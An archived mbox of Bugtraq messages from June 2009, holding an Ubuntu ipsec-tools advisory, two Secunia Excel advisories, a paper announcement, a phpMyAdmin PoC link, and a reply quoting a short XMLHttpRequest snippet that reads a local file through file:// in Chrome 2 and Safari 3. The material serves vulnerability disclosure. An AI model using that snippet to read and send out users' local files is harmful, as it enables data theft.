===========================================================
Ubuntu Security Notice USN-785-1 June 09, 2009
ipsec-tools vulnerabilities
CVE-2009-1574, CVE-2009-1632
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
racoon 1:0.6.5-4ubuntu1.3
Ubuntu 8.04 LTS:
racoon 1:0.6.7-1.1ubuntu1.2
Ubuntu 8.10:
racoon 1:0.7-2.1ubuntu1.8.10.1
Ubuntu 9.04:
racoon 1:0.7-2.1ubuntu1.9.04.1
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
It was discovered that ipsec-tools did not properly handle certain
fragmented packets. A remote attacker could send specially crafted packets
to the server and cause a denial of service. (CVE-2009-1574)
It was discovered that ipsec-tools did not properly handle memory usage
when verifying certificate signatures or processing nat-traversal
keep-alive messages. A remote attacker could send specially crafted packets
to the server and exhaust available memory, leading to a denial of service.
(CVE-2009-1632)
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.3.diff.gz
Size/MD5: 47090 280779d90a0f7536848a1cca73341b6a
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.3.dsc
Size/MD5: 712 a90d9dc61b0362e9793b7435f1096d95
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5.orig.tar.gz
Size/MD5: 914466 168076243c023782d3fb44a583d4a32c
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.3_amd64.deb
Size/MD5: 89736 7a2f7d0e70937725f75e068ef591851b
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.5-4ubuntu1.3_amd64.deb
Size/MD5: 342898 47ac3ab37b8caff5aaf0d5906accb137
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.3_i386.deb
Size/MD5: 83186 607346303887d171e1f1a5159a9f9b39
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.5-4ubuntu1.3_i386.deb
Size/MD5: 311706 e584431a2e9b19db6341f56ca6d76045
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.3_powerpc.deb
Size/MD5: 91466 23d1170819d6c448a6200c5c810db09a
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.5-4ubuntu1.3_powerpc.deb
Size/MD5: 337228 932e5ea5fff47d58236f3880c16ab659
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.3_sparc.deb
Size/MD5: 86964 c7a8222b8615062a9100160809d13969
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.5-4ubuntu1.3_sparc.deb
Size/MD5: 317156 a7c21275f89d272693126d169b2a2f53
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.2.diff.gz
Size/MD5: 262804 bb0fae5ca464467e3f5d4003dd0ae245
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.2.dsc
Size/MD5: 827 6f9552f869c9f1650dfbe61a9ec16b47
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7.orig.tar.gz
Size/MD5: 933322 e9f38f6f12124b9c19da684c87db9fcf
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.2_amd64.deb
Size/MD5: 92200 556fdcda0401bb3f72b1cc03ca2174cf
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.2_amd64.deb
Size/MD5: 349432 f9f1e5ce0c9d3325a1f99225c76e0514
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.2_i386.deb
Size/MD5: 86780 be31f853e4981446c1e68a0c1c661c93
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.2_i386.deb
Size/MD5: 324470 a4725aef39e6d193139635f16f0b0daf
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.2_lpia.deb
Size/MD5: 87084 439fd07c48a7e7fca2cfd2f827172549
http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.2_lpia.deb
Size/MD5: 324632 05f4d7ef0fdad87891daf800a10141d9
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.2_powerpc.deb
Size/MD5: 96288 1b0910c9f460a559598c442152c5c66e
http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.2_powerpc.deb
Size/MD5: 351160 1996b4ddd1da36bcb19369d0bf187ff5
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.2_sparc.deb
Size/MD5: 91360 ca4f1b8bdb1a158a05de15d463029ae3
http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.6.7-1.1ubuntu1.2_sparc.deb
Size/MD5: 325708 909074d26813426f4a817e344a1a347e
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.8.10.1.diff.gz
Size/MD5: 66463 b3e1ed6684086f492e5e88dd47911e2c
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.8.10.1.dsc
Size/MD5: 1239 22bfe8fa650c999af53f3066d1ffeabd
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.7.orig.tar.gz
Size/MD5: 856242 1234d84ed02ca71eb01140ff96b81466
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.8.10.1_amd64.deb
Size/MD5: 103410 00e5e7c1dcd5bb25ba940619258cde82
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.7-2.1ubuntu1.8.10.1_amd64.deb
Size/MD5: 391092 947cff4ccead6d349f1bdb19232c886d
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.8.10.1_i386.deb
Size/MD5: 97706 bc615236c0a5f7aec7500b9db5ce3f85
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.7-2.1ubuntu1.8.10.1_i386.deb
Size/MD5: 364104 0a42533bf0df3b125113e355460a8232
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.8.10.1_lpia.deb
Size/MD5: 97872 8cd16a8c856b1c93396a2c6a1da91905
http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.7-2.1ubuntu1.8.10.1_lpia.deb
Size/MD5: 362796 6471414a83e1078456b8931d123ae922
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.8.10.1_powerpc.deb
Size/MD5: 107654 781298571d8b7ef05b8bd3dcff5aca42
http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.7-2.1ubuntu1.8.10.1_powerpc.deb
Size/MD5: 387528 34371c933ef8c53779eb1d1bed08b47b
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.8.10.1_sparc.deb
Size/MD5: 102058 b1bf8799d9fb4576b9d4395b30c67fc4
http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.7-2.1ubuntu1.8.10.1_sparc.deb
Size/MD5: 363148 b41da262b7728474315c5f4321100444
Updated packages for Ubuntu 9.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.9.04.1.diff.gz
Size/MD5: 66469 b63e878ed9f3e78dfcf8642f87e7e4fd
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.9.04.1.dsc
Size/MD5: 1239 b647364b24f844124eb0739c328169ea
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.7.orig.tar.gz
Size/MD5: 856242 1234d84ed02ca71eb01140ff96b81466
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.9.04.1_amd64.deb
Size/MD5: 103394 318c7bfdcd01734461b2b7bb17d33a7c
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.7-2.1ubuntu1.9.04.1_amd64.deb
Size/MD5: 391008 294fa1d0c0d5926793e0abb00220928f
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.9.04.1_i386.deb
Size/MD5: 97736 7b66eed93ec5efce3da76a983a56329c
http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.7-2.1ubuntu1.9.04.1_i386.deb
Size/MD5: 363980 65d55da7dbd181daf60a15631eac6404
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.9.04.1_lpia.deb
Size/MD5: 97882 7cfc1df5732de7d3270adaf527c492f3
http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.7-2.1ubuntu1.9.04.1_lpia.deb
Size/MD5: 362768 db27dd703945342fc35f34f1be604680
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.9.04.1_powerpc.deb
Size/MD5: 107644 150591d53fe9c2f590ba437d4225bd9a
http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.7-2.1ubuntu1.9.04.1_powerpc.deb
Size/MD5: 387744 cf9a66e7a81d5d05208ce64616b46e77
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.7-2.1ubuntu1.9.04.1_sparc.deb
Size/MD5: 101946 ae8681001d73afa9c03bd024831d4de6
http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.7-2.1ubuntu1.9.04.1_sparc.deb
Size/MD5: 363090 690b8c5da3f67e94783608f8352c1520
--=-i8Ge6HWx3/BkmkGO6gem
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEABECAAYFAkouqYgACgkQLMAs/0C4zNo2qwCgrp/BPjYRMxoEfylo4BIrXU4C
AZoAnRtTmu1mn91YuDsPjEYejpqMwChL
=ARRO
-----END PGP SIGNATURE-----
--=-i8Ge6HWx3/BkmkGO6gem--
From - Tue Jun 9 15:57:21 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000821e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40591-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id AD055EC18A
for <lists@securityspace.com>; Tue, 9 Jun 2009 15:55:58 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 8CC021437E8; Tue, 9 Jun 2009 13:04:46 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24460 invoked from network); 9 Jun 2009 12:59:32 -0000
Date: 9 Jun 2009 13:00:01 -0000
Message-ID: <20090609130001.31933.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: marian.ventuneac@ul.ie
To: bugtraq@securityfocus.com
Subject: New paper - Testing the Enterprise Security: Anti-Spam and
Anti-Virus Solutions
Status:
Paper: Testing the Enterprise Security: Anti-Spam and Anti-Virus Solutions
Abstract:
Enterprise Anti-Spam and Anti-Virus solutions are widely used to protect corporate e-mail servers against various external threats including spamming, viruses, spyware, and phishing attacks. Usually claiming a high rate of malicious message filtering (between 95-99%), it is hard to argue that its main purpose is realized. However, no comprehensive benchmarking on how such security solutions stand against internal attacks is currently available. Relying on various commercial and open-source technologies (Microsoft .NET, MySQL, PHP, Linux, Apache HTTP server, etc.), the majority of Anti-Spam and Anti-Virus enterprise solutions employ Web-based applications to allow remote configuration, administration and management of spam-quarantined e-mails. While Web-based applications are often found to be vulnerable to a wide variety of security vulnerabilities (including SQL Injection, Cross-Site Scripting, Denial of Service, Privilege Escalation, etc.), such enterprise security solution
s make unfortunately no exception.
This paper highlights the need of vendor-certified security testing for Anti-Spam and Anti-
Virus enterprise solutions, in order to protect it against internal attacks. In a structured effort to benchmark and potentially improve various enterprise security products, the author�s recent research done in collaboration with Data Communication Security Laboratory from University of Limerick, (Ireland) is presented. Various security vulnerabilities identified in high-profile enterprise Anti-Spam and Anti-Virus products commercialized by vendors such as Marshal8e6 [1], Barracuda Networks [2], and Symantec [3] are discussed, while the implications of vulnerabilities exploitation and the risks for the enterprise are analyzed.
Author: Dr. Marian Ventuneac
Paper download:
http://www.testingexperience.com/testingexperience02_09.pdf
From - Tue Jun 9 17:07:20 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000821f
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40592-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 38F65EC17E
for <lists@securityspace.com>; Tue, 9 Jun 2009 17:06:39 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 328E8237035; Tue, 9 Jun 2009 15:01:33 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 6955 invoked from network); 9 Jun 2009 19:20:05 -0000
MIME-Version: 1.0
In-Reply-To: <200906091633.n59GX9Xt007060@www3.securityfocus.com>
References: <200906091633.n59GX9Xt007060@www3.securityfocus.com>
Date: Tue, 9 Jun 2009 20:21:32 +0100
Message-ID: <10e6de610906091221w1d531c57g9641c224f569d3e8@mail.gmail.com>
Subject: Re: XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3
From: "Adrian P." <ap@gnucitizen.org>
To: pantera_bleed@hotmail.com
Cc: bugtraq@securityfocus.com
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Status:
it's always been possible to steal local files if you can convince a
user to open a "harmless" html file from their local filesystem. this
is possible because the scripting code runs within local context (in
FF terminology - not sure what Safari calls it).
last time i checked [1] [2] FF didn't even issue a warning when
opening a local file with scripting code in it, although i haven't
checked in the case of Safari
[1]
http://www.gnucitizen.org/blog/web-pages-from-hell-2/
[2]
http://marc.info/?l=bugtraq&m=116386919506057&w=2
On Tue, Jun 9, 2009 at 5:33 PM, <pantera_bleed@hotmail.com> wrote:
>
> .html can be crafted to force a unaware user to read file from local, and then possibly send it to a server.
>
> var method = "GET"
> var URL = "file:///C:/argentina/bsas_junin.txt"
> xmlhttp.open( method, URL, true)
>
> This type of request is possible if file is on user local �in the user hard disk (CHROME2), in other browser I was able to do the same but with a LAN access to file, no need to write in local hard disk (SAFARI3)
>
>
> if (xmlhttp != null) {
> � � � �xmlhttp.open( method, URL, true)
> � � � �xmlhttp.onreadystatechange=function(){
> � � � �if (xmlhttp.readyState==4) {
> � � � � � alert(URL + "\n\n" + xmlhttp.responseText)
> � � � � � � � �}
> � � � � � � � �}
> � � � �}
>
> this is a valid operation javascript can read then xmlhttp.responseText, yes the file content.
>
> After this you can do whatever you want whit the file.
>
> note that you MUST know the file path!!
>
> crafted by: federico.lanusse
> pantera_bleed@hotmail.com
> federico.lanusse@clarolab.com
>
> company: clarolab QA team
> yeah! lets rock Ateam!!
>
> Chrome ISSUE, with attached POC.
>
http://code.google.com/p/chromium/issues/detail?id=13671
>
From - Tue Jun 9 17:27:20 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008220
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40593-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id E5397EC185
for <lists@securityspace.com>; Tue, 9 Jun 2009 17:18:18 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id DFE8D23736E; Tue, 9 Jun 2009 15:01:50 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8334 invoked from network); 9 Jun 2009 19:39:31 -0000
Date: Tue, 9 Jun 2009 21:38:44 +0200
Message-Id: <200906091938.n59JciiN021304@ca.secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: Microsoft Excel Record Parsing Array Indexing Vulnerability
From: Secunia Research <remove-vuln@secunia.com>
Status:
=====================================================================
Secunia Research 09/06/2009
- Microsoft Excel Record Parsing Array Indexing Vulnerability -
=====================================================================Table of Contents
Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10
=====================================================================1) Affected Software
* Microsoft Office Excel 2000
NOTE: Other versions may also be affected.
=====================================================================2) Severity
Rating: Highly critical
Impact: System compromise
Where: Remote
=====================================================================3) Vendor's Description of Software
"Microsoft Office Excel is a powerful tool you can use to create and
format spreadsheets, and analyze and share information to make more
informed decisions.".
Product Link:
http://office.microsoft.com/excel
=====================================================================4) Description of Vulnerability
Secunia Research has discovered a vulnerability in Microsoft Excel,
which can be exploited by malicious people to compromise a user's
system.
The vulnerability is caused due to an array-indexing error when
processing certain records. This can be exploited to corrupt memory
via a specially crafted Excel file.
Successful exploitation may allow execution of arbitrary code.
=====================================================================5) Solution
Apply patches from MS09-021.
=====================================================================6) Time Table
06/01/2009 - Vendor notified.
07/01/2009 - Vendor response.
08/01/2009 - Additional information provided to the vendor.
08/01/2009 - Vendor response.
19/02/2009 - Vendor provides status update.
24/04/2009 - Vendor provides status update.
22/05/2009 - Vendor provides status update.
09/06/2009 - Public disclosure.
=====================================================================7) Credits
Discovered by Carsten Eiram, Secunia Research.
=====================================================================8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0558 for the vulnerability.
=====================================================================9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
=====================================================================10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-1/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
=====================================================================
From - Tue Jun 9 17:37:20 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008221
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40594-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 18ECEEC185
for <lists@securityspace.com>; Tue, 9 Jun 2009 17:29:49 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id A9EE1237379; Tue, 9 Jun 2009 15:02:04 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8411 invoked from network); 9 Jun 2009 19:42:49 -0000
Date: Tue, 9 Jun 2009 21:42:09 +0200
Message-Id: <200906091942.n59Jg9Pc022857@ca.secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: Microsoft Excel String Parsing Integer Overflow Vulnerability
From: Secunia Research <remove-vuln@secunia.com>
Status:
=====================================================================
Secunia Research 09/06/2009
- Microsoft Excel String Parsing Integer Overflow -
=====================================================================Table of Contents
Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10
=====================================================================1) Affected Software
* Microsoft Office Excel 2003
NOTE: Other versions may also be affected.
=====================================================================2) Severity
Rating: Highly critical
Impact: System compromise
Where: Remote
=====================================================================3) Vendor's Description of Software
"Microsoft Office Excel is a powerful tool you can use to create and
format spreadsheets, and analyze and share information to make more
informed decisions.".
Product Link:
http://office.microsoft.com/excel
=====================================================================4) Description of Vulnerability
Secunia Research has discovered a vulnerability in Microsoft Office
Excel, which can be exploited by malicious people to compromise a
user's system.
The vulnerability is caused due to an integer overflow error when
processing the number of strings in a file and can be exploited to
cause a heap-based buffer overflow via a specially crafted Excel
file.
Successful exploitation allows execution of arbitrary code.
=====================================================================5) Solution
Apply patches from MS09-021.
=====================================================================6) Time Table
10/03/2009 - Vendor notified.
10/03/2009 - Vendor response.
19/05/2009 - Status update requested.
22/05/2009 - Vendor provides status update.
09/06/2009 - Public disclosure.
=====================================================================7) Credits
Discovered by Carsten Eiram, Secunia Research.
=====================================================================8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0561 for the vulnerability.
=====================================================================9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
=====================================================================10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-12/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
=====================================================================
From - Tue Jun 9 17:47:20 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008222
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40595-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 48BDDEC185
for <lists@securityspace.com>; Tue, 9 Jun 2009 17:39:01 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C8A89237380; Tue, 9 Jun 2009 15:02:33 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8528 invoked from network); 9 Jun 2009 19:46:05 -0000
MIME-Version: 1.0
Date: Tue, 9 Jun 2009 20:47:33 +0100
Message-ID: <10e6de610906091247q71f7f244lcf731cf3bef7fa8e@mail.gmail.com>
Subject: CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
From: "Adrian P." <ap@gnucitizen.org>
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
Status:
I couldn�t find any public PoC for this phpMyAdmin vulnerability, so I
wrote one:
http://www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/
From - Tue Jun 9 17:47:21 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008223
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40596-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 5A72CEC185
for <lists@securityspace.com>; Tue, 9 Jun 2009 17:46:39 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 590C2237240; Tue, 9 Jun 2009 15:13:20 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10833 invoked from network); 9 Jun 2009 21:07:23 -0000
MIME-Version: 1.0
In-Reply-To: <200906091633.n59GX9Xt007060@www3.securityfocus.com>
References: <200906091633.n59GX9Xt007060@www3.securityfocus.com>
Date: Tue, 9 Jun 2009 14:08:41 -0700
Message-ID: <448e9a320906091408sff29083xefad6f417baaf17a@mail.gmail.com>
Subject: Re: XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3
From: Michal Zalewski <lcamtuf@coredump.cx>
To: pantera_bleed@hotmail.com
Cc: bugtraq@securityfocus.com
